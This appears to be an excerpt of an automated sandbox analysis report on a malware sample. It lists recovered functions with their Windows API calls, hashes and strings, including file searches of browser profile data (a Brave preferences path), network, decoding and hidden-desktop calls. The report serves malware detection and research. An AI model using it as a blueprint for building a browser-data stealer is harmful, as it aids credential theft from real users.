lstrcpy.KERNEL32(00000000,00000000), ref: 024720A5
GetFileAttributesA.KERNEL32(00000000), ref: 024720AC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02472106
lstrlen.KERNEL32(006389F0), ref: 02472115
lstrcpy.KERNEL32(00000000,?), ref: 02472142
lstrcat.KERNEL32(00000000,?), ref: 0247214A
lstrlen.KERNEL32(00431D64), ref: 02472155
lstrcpy.KERNEL32(00000000,00000000), ref: 02472175
lstrcat.KERNEL32(00000000,00431D64), ref: 02472181
lstrcpy.KERNEL32(00000000,?), ref: 024721A9
lstrcat.KERNEL32(00000000,00000000), ref: 024721B4
lstrlen.KERNEL32(00431D64), ref: 024721BF
lstrcpy.KERNEL32(00000000,00000000), ref: 024721DC
lstrcat.KERNEL32(00000000,00431D64), ref: 024721E8

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
String ID:
API String ID: 4127656590-0
Opcode ID: 58bcd7dfca981f448704edd035e49fb4acc7a00dca7f0eefd485a99d3c8059f6
Instruction ID: 0cf43f70e31b15f1f6947e46256f75ad1a807ac334b74be09de5ffc6982db97f
Opcode Fuzzy Hash: 58bcd7dfca981f448704edd035e49fb4acc7a00dca7f0eefd485a99d3c8059f6
Instruction Fuzzy Hash: AF9282719016569BDB21EF75CC88AEF77BAAF44708F04402AEC29A7350DBB4D901DFA0

Function 02487047 Relevance: 147.8, APIs: 83, Strings: 1, Instructions: 752stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248707C
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024870AF
lstrcpy.KERNEL32(00000000,00000000), ref: 024870E9
lstrcpy.KERNEL32(00000000,00000000), ref: 02487110
lstrcat.KERNEL32(00000000,00000000), ref: 0248711B
lstrcpy.KERNEL32(00000000,00000000), ref: 02487144
lstrlen.KERNEL32(00435320), ref: 0248715E
lstrcpy.KERNEL32(00000000,00000000), ref: 02487180
lstrcat.KERNEL32(00000000,00435320), ref: 0248718C
lstrcpy.KERNEL32(00000000,00000000), ref: 024871B7
lstrcpy.KERNEL32(00000000,00000000), ref: 024871E7
LocalAlloc.KERNEL32(00000040,?), ref: 0248721C
strtok_s.MSVCRT ref: 02487249
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024872B4

Strings

hSC, xrefs: 02487651, 02487654, 024876CD

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
String ID: hSC
API String ID: 922491270-3351665975
Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction ID: 8f9c243880a17aaf339edc4f03978a9a05c6273beea91e013a68e4b440da7831
Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction Fuzzy Hash: 5442C374A10215ABDB21FF74CC98BAFBBB6AF44704F24541AF811A7251DBB8D901DFA0

Function 02481EA7 Relevance: 132.9, APIs: 88, Instructions: 909stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481ED9
lstrlen.KERNEL32(00431D68), ref: 02481EE4
lstrcpy.KERNEL32(00000000,?), ref: 02481F06
lstrcat.KERNEL32(00000000,00431D68), ref: 02481F12
lstrcpy.KERNEL32(00000000,00000000), ref: 02481F39
FindFirstFileA.KERNEL32(00000000,?), ref: 02481F4E
StrCmpCA.SHLWAPI(?,00431D70), ref: 02481F6E
StrCmpCA.SHLWAPI(?,00431D74), ref: 02481F88
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481FC6
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481FF9
lstrcpy.KERNEL32(00000000,?), ref: 02482021
lstrcat.KERNEL32(00000000,00000000), ref: 0248202C
lstrcpy.KERNEL32(00000000,00000000), ref: 02482053
lstrlen.KERNEL32(00431D64), ref: 02482065
lstrcpy.KERNEL32(00000000,00000000), ref: 02482087
lstrcat.KERNEL32(00000000,00431D64), ref: 02482093
lstrcpy.KERNEL32(00000000,00000000), ref: 024820BB
lstrlen.KERNEL32(?), ref: 024820CF
lstrcpy.KERNEL32(00000000,00000000), ref: 024820EC
lstrcat.KERNEL32(00000000,?), ref: 024820FA
lstrcpy.KERNEL32(00000000,00000000), ref: 02482120
lstrlen.KERNEL32(00638D00), ref: 02482136
lstrcpy.KERNEL32(00000000,00000000), ref: 02482160
lstrcat.KERNEL32(00000000,00000000), ref: 0248216B
lstrcpy.KERNEL32(00000000,00000000), ref: 02482196
lstrlen.KERNEL32(00431D64), ref: 024821A8
lstrcpy.KERNEL32(00000000,00000000), ref: 024821CA
lstrcat.KERNEL32(00000000,00431D64), ref: 024821D6
lstrcpy.KERNEL32(00000000,00000000), ref: 024821FF
lstrcpy.KERNEL32(00000000,00000000), ref: 0248222C
lstrcat.KERNEL32(00000000,00000000), ref: 02482237
lstrcpy.KERNEL32(00000000,00000000), ref: 0248225E
lstrlen.KERNEL32(00431D64), ref: 02482270
lstrcpy.KERNEL32(00000000,00000000), ref: 02482292
lstrcat.KERNEL32(00000000,00431D64), ref: 0248229E
lstrcpy.KERNEL32(00000000,00000000), ref: 024822C7
lstrcpy.KERNEL32(00000000,00000000), ref: 024822F6
lstrcat.KERNEL32(00000000,00000000), ref: 02482301
lstrcpy.KERNEL32(00000000,00000000), ref: 02482328
lstrlen.KERNEL32(00431D64), ref: 0248233A
lstrcpy.KERNEL32(00000000,00000000), ref: 0248235C
lstrcat.KERNEL32(00000000,00431D64), ref: 02482368
lstrcpy.KERNEL32(00000000,00000000), ref: 02482391
lstrcpy.KERNEL32(00000000,00000000), ref: 024823C0
lstrcat.KERNEL32(00000000,00000000), ref: 024823CB
lstrcpy.KERNEL32(00000000,00000000), ref: 024823F4
lstrlen.KERNEL32(00431D64), ref: 02482420
lstrcpy.KERNEL32(00000000,00000000), ref: 0248243D
lstrcat.KERNEL32(00000000,00431D64), ref: 02482449
lstrcpy.KERNEL32(00000000,00000000), ref: 0248246F
lstrlen.KERNEL32(006389A8), ref: 02482485
lstrcpy.KERNEL32(00000000,00000000), ref: 024824B9
lstrlen.KERNEL32(00431D64), ref: 024824CD
lstrcpy.KERNEL32(00000000,00000000), ref: 024824EA
lstrcat.KERNEL32(00000000,00431D64), ref: 024824F6
lstrcpy.KERNEL32(00000000,00000000), ref: 0248251C
lstrlen.KERNEL32(00638BDC), ref: 02482532
lstrcpy.KERNEL32(00000000,00000000), ref: 02482566
lstrlen.KERNEL32(00431D64), ref: 0248257A
lstrcpy.KERNEL32(00000000,00000000), ref: 02482597
lstrcat.KERNEL32(00000000,00431D64), ref: 024825A3
lstrcpy.KERNEL32(00000000,00000000), ref: 024825C9
lstrlen.KERNEL32(00638CE8), ref: 024825DF
lstrcpy.KERNEL32(00000000,00000000), ref: 02482607
lstrcat.KERNEL32(00000000,00000000), ref: 02482612
lstrcpy.KERNEL32(00000000,00000000), ref: 0248263D
lstrlen.KERNEL32(00431D64), ref: 0248264F
lstrcpy.KERNEL32(00000000,00000000), ref: 0248266E
lstrcat.KERNEL32(00000000,00431D64), ref: 0248267A
lstrcpy.KERNEL32(00000000,00000000), ref: 0248269F
lstrlen.KERNEL32(?), ref: 024826B3
lstrcpy.KERNEL32(00000000,00000000), ref: 024826D7
lstrcat.KERNEL32(00000000,?), ref: 024826E5
lstrcpy.KERNEL32(00000000,00000000), ref: 0248270A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02482746
lstrlen.KERNEL32(00638CA4), ref: 02482755
lstrcpy.KERNEL32(00000000,00000000), ref: 0248277D
lstrcat.KERNEL32(00000000,00000000), ref: 02482788

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
String ID:
API String ID: 712834838-0
Opcode ID: cc33be6ce75fcd50f2f3e77070ad771e1d50a9dd59699009f98acb36ec3c53b7
Instruction ID: d35283c4dc681cdca6d51ec1ec8ee354b57cf0369a14d603fd0453b99d23f242
Opcode Fuzzy Hash: cc33be6ce75fcd50f2f3e77070ad771e1d50a9dd59699009f98acb36ec3c53b7
Instruction Fuzzy Hash: D9627C71911656ABDB21FF75CC88AEF77BAAF44708F04052AEC15A7260DBB4D901CFA0

Function 02476267 Relevance: 128.6, APIs: 68, Strings: 5, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 02476296
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024762E9
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247631C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247634C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02476387
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024763BA
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 024763CA

Strings

------, xrefs: 024764F0, 0247651D, 02476795, 02476886
TPC, xrefs: 02476868
TPC, xrefs: 024768C0
TPC, xrefs: 024767D2
", xrefs: 0247682E, 0247691C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$TPC$TPC$TPC
API String ID: 2041821634-3953685780
Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction ID: 2cea7d22fb72fc9ba6486fb6921672d5dc6e09a25a8fd4cb6e2b56c8a7a15514
Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction Fuzzy Hash: 2F5260719006569FDB20EF75DC88EEE7BBBAF44308F15442AE825AB650DB74D805CFA0

Function 02483F27 Relevance: 122.4, APIs: 81, Instructions: 869stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02483F43
FindFirstFileA.KERNEL32(?,?), ref: 02483F5A
StrCmpCA.SHLWAPI(?,00431D70), ref: 02483F83
StrCmpCA.SHLWAPI(?,00431D74), ref: 02483F9D
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02483FD6
lstrcpy.KERNEL32(00000000,?), ref: 02483FFE
lstrcat.KERNEL32(00000000,00000000), ref: 02484009
lstrlen.KERNEL32(00431D64), ref: 02484014
lstrcpy.KERNEL32(00000000,00000000), ref: 02484031
lstrcat.KERNEL32(00000000,00431D64), ref: 0248403D
lstrlen.KERNEL32(?), ref: 0248404A
lstrcpy.KERNEL32(00000000,00000000), ref: 0248406A
lstrcat.KERNEL32(00000000,?), ref: 02484078
lstrcpy.KERNEL32(00000000,00000000), ref: 024840A1
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024840E5
lstrlen.KERNEL32(?), ref: 024840EF
lstrcpy.KERNEL32(00000000,00000000), ref: 0248411C
lstrcat.KERNEL32(00000000,00000000), ref: 02484127
lstrcpy.KERNEL32(00000000,00000000), ref: 0248414D
lstrlen.KERNEL32(00431D64), ref: 0248415F
lstrcpy.KERNEL32(00000000,00000000), ref: 02484181
lstrcat.KERNEL32(00000000,00431D64), ref: 0248418D
lstrcpy.KERNEL32(00000000,00000000), ref: 024841B5
lstrlen.KERNEL32(?), ref: 024841C9
lstrcpy.KERNEL32(00000000,00000000), ref: 024841E9
lstrcat.KERNEL32(00000000,?), ref: 024841F7
lstrlen.KERNEL32(006389F0), ref: 02484222
lstrcpy.KERNEL32(00000000,00000000), ref: 02484248
lstrcat.KERNEL32(00000000,00000000), ref: 02484253
lstrlen.KERNEL32(00638D00), ref: 02484275
lstrcpy.KERNEL32(00000000,00000000), ref: 0248429B
lstrcat.KERNEL32(00000000,00000000), ref: 024842A6
lstrcpy.KERNEL32(00000000,00000000), ref: 024842CE
lstrlen.KERNEL32(00431D64), ref: 024842E0
lstrcpy.KERNEL32(00000000,00000000), ref: 024842FF
lstrcat.KERNEL32(00000000,00431D64), ref: 0248430B
lstrcpy.KERNEL32(00000000,00000000), ref: 02484331
lstrcpy.KERNEL32(00000000,?), ref: 0248435E
lstrcat.KERNEL32(00000000,00000000), ref: 02484369
lstrcpy.KERNEL32(00000000,00000000), ref: 02484390
lstrlen.KERNEL32(00431D64), ref: 024843A2
lstrcpy.KERNEL32(00000000,00000000), ref: 024843C4
lstrcat.KERNEL32(00000000,00431D64), ref: 024843D0
lstrcpy.KERNEL32(00000000,00000000), ref: 024843F9
lstrcpy.KERNEL32(00000000,00000000), ref: 02484428
lstrcat.KERNEL32(00000000,00000000), ref: 02484433
lstrcpy.KERNEL32(00000000,00000000), ref: 0248445A
lstrlen.KERNEL32(00431D64), ref: 0248446C
lstrcpy.KERNEL32(00000000,00000000), ref: 0248448E
lstrcat.KERNEL32(00000000,00431D64), ref: 0248449A
lstrcpy.KERNEL32(00000000,00000000), ref: 024844C3
lstrcpy.KERNEL32(00000000,00000000), ref: 024844F2
lstrcat.KERNEL32(00000000,00000000), ref: 024844FD
lstrcpy.KERNEL32(00000000,00000000), ref: 02484524
lstrlen.KERNEL32(00431D64), ref: 02484536
lstrcpy.KERNEL32(00000000,00000000), ref: 02484558
lstrcat.KERNEL32(00000000,00431D64), ref: 02484564
lstrcpy.KERNEL32(00000000,00000000), ref: 0248458C
lstrlen.KERNEL32(?), ref: 024845A0
lstrcpy.KERNEL32(00000000,00000000), ref: 024845C0
lstrcat.KERNEL32(00000000,?), ref: 024845CE
lstrcpy.KERNEL32(00000000,00000000), ref: 024845F7
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02484636
lstrlen.KERNEL32(00638CA4), ref: 02484645
lstrcpy.KERNEL32(00000000,00000000), ref: 0248466D
lstrcat.KERNEL32(00000000,00000000), ref: 02484678
lstrcpy.KERNEL32(00000000,00000000), ref: 024846A1
lstrcpy.KERNEL32(00000000,00000000), ref: 024846E5
lstrcat.KERNEL32(00000000), ref: 024846F2
FindNextFileA.KERNEL32(00000000,?), ref: 024848F0
FindClose.KERNEL32(00000000), ref: 024848FF

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 1006159827-0
Opcode ID: 293ed328344b4165c013f043e32d74a9a14dbec6b56df4621553222640ab2117
Instruction ID: 890a3da49ddd3ef2636f037227d1e40cc92ccb0da915e0d8ec6938ade412a382
Opcode Fuzzy Hash: 293ed328344b4165c013f043e32d74a9a14dbec6b56df4621553222640ab2117
Instruction Fuzzy Hash: C5628F71911657ABDB21FF75CC88AEF77BAAF44708F04412AE815A7250DBB8D901CFA0

Function 02487260 Relevance: 114.3, APIs: 64, Strings: 1, Instructions: 526stringmemoryencryptionCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024872B4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024872E4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487316
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02487323
RtlAllocateHeap.NTDLL(00000000), ref: 0248732A
StrStrA.SHLWAPI(00000000,00435350), ref: 02487341
lstrlen.KERNEL32(00000000), ref: 0248734C
malloc.MSVCRT ref: 02487356
strncpy.MSVCRT ref: 02487364
lstrcpy.KERNEL32(00000000,00000000), ref: 0248738F
lstrcpy.KERNEL32(00000000,00000000), ref: 024873B6
StrStrA.SHLWAPI(00000000,00435358), ref: 024873C9
lstrlen.KERNEL32(00000000), ref: 024873D4
malloc.MSVCRT ref: 024873DE
strncpy.MSVCRT ref: 024873EC
lstrcpy.KERNEL32(00000000,00000000), ref: 02487417
lstrcpy.KERNEL32(00000000,00000000), ref: 0248743E
StrStrA.SHLWAPI(00000000,00435360), ref: 02487451
lstrlen.KERNEL32(00000000), ref: 0248745C
malloc.MSVCRT ref: 02487466
strncpy.MSVCRT ref: 02487474
lstrcpy.KERNEL32(00000000,00000000), ref: 0248749F
lstrcpy.KERNEL32(00000000,00000000), ref: 024874C6
StrStrA.SHLWAPI(00000000,00435368), ref: 024874D9
lstrlen.KERNEL32(00000000), ref: 024874E8
malloc.MSVCRT ref: 024874F2
strncpy.MSVCRT ref: 02487500
lstrcpy.KERNEL32(00000000,00000000), ref: 02487530
lstrcpy.KERNEL32(00000000,00000000), ref: 02487558
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0248757B
LocalAlloc.KERNEL32(00000040,00000000), ref: 0248758F
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024875B0
LocalFree.KERNEL32(00000000), ref: 024875BB
lstrlen.KERNEL32(?), ref: 02487655
lstrlen.KERNEL32(?), ref: 02487668
lstrlen.KERNEL32(?), ref: 0248767B

Strings

hSC, xrefs: 02487651, 02487654, 024876CD

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
String ID: hSC
API String ID: 2413810636-3351665975
Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction ID: ce42784ef6800aa131029ae0e68935b8157b2cfd17480bedabac31523f9ab5c2
Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction Fuzzy Hash: BD028074A10215ABDB20FF74DC48BAEBBB6AF08704F24541AF815E7251DBB8D901DFA0

Function 0247DFD7 Relevance: 88.8, APIs: 48, Strings: 2, Instructions: 1264stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247E02A
lstrcpy.KERNEL32(00000000,?), ref: 0247E075
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247E0B6
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247E0E6
FindFirstFileA.KERNEL32(?,?), ref: 0247E0F7

Strings

lRC, xrefs: 0247E03E
\Brave\Preferences, xrefs: 0247E503

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirst
String ID: \Brave\Preferences$lRC
API String ID: 157892242-2889925444
Opcode ID: 2ae95654697341e2d9d78368bd15d2fdfc39750d280e88d0c6b86a57977b62f0
Instruction ID: 20990296537f758b9d7e5c136191aa761eff2938274e2c40d9acd3b843a6b52e
Opcode Fuzzy Hash: 2ae95654697341e2d9d78368bd15d2fdfc39750d280e88d0c6b86a57977b62f0
Instruction Fuzzy Hash: 1AB27F71B012158FDB24DF65C844BDA7BF6AF44318F1886AEE819AB351DB74E841CF90

Function 02481827 Relevance: 62.0, APIs: 41, Instructions: 526stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481869
lstrcpy.KERNEL32(00000000,00000000), ref: 0248188C
lstrcat.KERNEL32(00000000,00000000), ref: 02481897
lstrlen.KERNEL32(0043526C), ref: 024818A2
lstrcpy.KERNEL32(00000000,00000000), ref: 024818BF
lstrcat.KERNEL32(00000000,0043526C), ref: 024818CB
lstrcpy.KERNEL32(00000000,00000000), ref: 024818F9
FindFirstFileA.KERNEL32(00000000,?), ref: 02481913
StrCmpCA.SHLWAPI(?,00431D70), ref: 02481932
StrCmpCA.SHLWAPI(?,00431D74), ref: 0248194A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481987
lstrcpy.KERNEL32(00000000,?), ref: 024819B0
lstrcat.KERNEL32(00000000,00000000), ref: 024819BB
lstrlen.KERNEL32(00431D64), ref: 024819C6
lstrcpy.KERNEL32(00000000,00000000), ref: 024819E3
lstrcat.KERNEL32(00000000,00431D64), ref: 024819EF
lstrlen.KERNEL32(?), ref: 024819FA
lstrcpy.KERNEL32(00000000,00000000), ref: 02481A1C
lstrcat.KERNEL32(00000000,?), ref: 02481A28
lstrcpy.KERNEL32(00000000,00000000), ref: 02481A55
StrCmpCA.SHLWAPI(?,00638C28), ref: 02481A7C
lstrcpy.KERNEL32(00000000,?), ref: 02481ABD
lstrcpy.KERNEL32(00000000,?), ref: 02481AE6
lstrcpy.KERNEL32(00000000,?), ref: 02481B1A
StrCmpCA.SHLWAPI(?,006388A8), ref: 02481B35
lstrcpy.KERNEL32(00000000,?), ref: 02481B76
lstrcpy.KERNEL32(00000000,?), ref: 02481B9F
lstrcpy.KERNEL32(00000000,?), ref: 02481BD3
StrCmpCA.SHLWAPI(?,00638E3C), ref: 02481BEF
lstrcpy.KERNEL32(00000000,?), ref: 02481C20
lstrcpy.KERNEL32(00000000,?), ref: 02481C49
lstrcpy.KERNEL32(00000000,?), ref: 02481C72
StrCmpCA.SHLWAPI(?,00638938), ref: 02481C9E
lstrcpy.KERNEL32(00000000,?), ref: 02481CDF
lstrcpy.KERNEL32(00000000,?), ref: 02481D08
lstrcpy.KERNEL32(00000000,?), ref: 02481D3C
lstrcpy.KERNEL32(00000000,?), ref: 02481D8B
lstrcpy.KERNEL32(00000000,?), ref: 02481DBF
lstrcpy.KERNEL32(00000000,?), ref: 02481DFA
FindNextFileA.KERNEL32(00000000,?), ref: 02481E22
FindClose.KERNEL32(00000000), ref: 02481E31

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
String ID:
API String ID: 1346933759-0
Opcode ID: 305c3d06416b015528e76a0012c4fbf1ceb80ae9780ebd3fdd7e611fdf6c72f7
Instruction ID: 17cfb346535cb6512d240d8ccba00d0f7f3fcbc894b11aadf73eb3b0daa53fab
Opcode Fuzzy Hash: 305c3d06416b015528e76a0012c4fbf1ceb80ae9780ebd3fdd7e611fdf6c72f7
Instruction Fuzzy Hash: EA123D716103429BDB24FF39DC88AAF77E6AF44309F04492EE89997650EB74D805CFA1

Function 02496627 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02496680
GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02496699
GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024966B1
GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024966C9
GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024966E2
GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024966FA
GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02496712
GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0249672B
GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02496743
GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0249675B
GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02496774
GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0249678C
GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024967A4
GetProcAddress.KERNEL32(006390E0,00638D98), ref: 024967BD
GetProcAddress.KERNEL32(006390E0,00638A24), ref: 024967D5
GetProcAddress.KERNEL32(006390E0,00638C18), ref: 024967ED
GetProcAddress.KERNEL32(006390E0,00638E34), ref: 02496806
GetProcAddress.KERNEL32(006390E0,006388BC), ref: 0249681E
GetProcAddress.KERNEL32(006390E0,0063892C), ref: 02496836
GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 0249684F
LoadLibraryA.KERNEL32(00638D50,?,?,?,02491E4A), ref: 02496860
LoadLibraryA.KERNEL32(0063897C,?,?,?,02491E4A), ref: 02496872
LoadLibraryA.KERNEL32(00638904,?,?,?,02491E4A), ref: 02496884
LoadLibraryA.KERNEL32(006389DC,?,?,?,02491E4A), ref: 02496895
LoadLibraryA.KERNEL32(00638B28,?,?,?,02491E4A), ref: 024968A7
GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 024968C4
GetProcAddress.KERNEL32(00639020,00638C24), ref: 024968E0
GetProcAddress.KERNEL32(00639020,006389CC), ref: 024968F8
GetProcAddress.KERNEL32(00639114,00638B94), ref: 02496914
GetProcAddress.KERNEL32(00638FD4,00638928), ref: 02496930
GetProcAddress.KERNEL32(00639004,00638C14), ref: 0249694C
GetProcAddress.KERNEL32(00639004,00435864), ref: 02496963

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: 68a24db6909e5046a650a0bfab6f4278826e85f0ef24f2fcffda4cf9f8fe41fe
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: 5DA16FB9A117009FD758DF65EE88A663BBBF789344300A51DF94683360DBB4A900DFB0

Function 0248CF47 Relevance: 40.8, APIs: 27, Instructions: 310filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0248CF63
FindFirstFileA.KERNEL32(?,?), ref: 0248CF7A
lstrcat.KERNEL32(?,?), ref: 0248CFC6
StrCmpCA.SHLWAPI(?,00431D70), ref: 0248CFD8
StrCmpCA.SHLWAPI(?,00431D74), ref: 0248CFF2
wsprintfA.USER32 ref: 0248D017
PathMatchSpecA.SHLWAPI(?,00638D64), ref: 0248D049
CoInitialize.OLE32(00000000), ref: 0248D055

Part of subcall function 0248CE47: CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0248CE6D
Part of subcall function 0248CE47: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0248CEAD
Part of subcall function 0248CE47: lstrcpyn.KERNEL32(?,?,00000104), ref: 0248CF30

CoUninitialize.COMBASE ref: 0248D070
lstrcat.KERNEL32(?,?), ref: 0248D095
lstrlen.KERNEL32(?), ref: 0248D0A2
StrCmpCA.SHLWAPI(?,0042D01C), ref: 0248D0BC
wsprintfA.USER32 ref: 0248D0E4
wsprintfA.USER32 ref: 0248D103
PathMatchSpecA.SHLWAPI(?,?), ref: 0248D117
wsprintfA.USER32 ref: 0248D13F
CopyFileA.KERNEL32(?,?,00000001), ref: 0248D158
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0248D177
GetFileSizeEx.KERNEL32(00000000,?), ref: 0248D18F
CloseHandle.KERNEL32(00000000), ref: 0248D19A
CloseHandle.KERNEL32(00000000), ref: 0248D1A6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0248D1BB
lstrcpy.KERNEL32(00000000,?), ref: 0248D1FB
FindNextFileA.KERNEL32(?,?), ref: 0248D2F4
FindClose.KERNEL32(?), ref: 0248D306

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
String ID:
API String ID: 3860919712-0
Opcode ID: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction ID: ff26eb89441c16f8996c5559f7b5780920d7cb508b6ebe29523b2f7b39abe8d3
Opcode Fuzzy Hash: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction Fuzzy Hash: 7CC16071910219EFDB54EF64DC44FEE77BAAF48304F00459AF919A7290DB74AA84CFA0

Function 00409876 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 174stringsleepprocessCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(?), ref: 00409888
memset.MSVCRT ref: 004098A6
lstrcatA.KERNEL32(?,?), ref: 004098BB
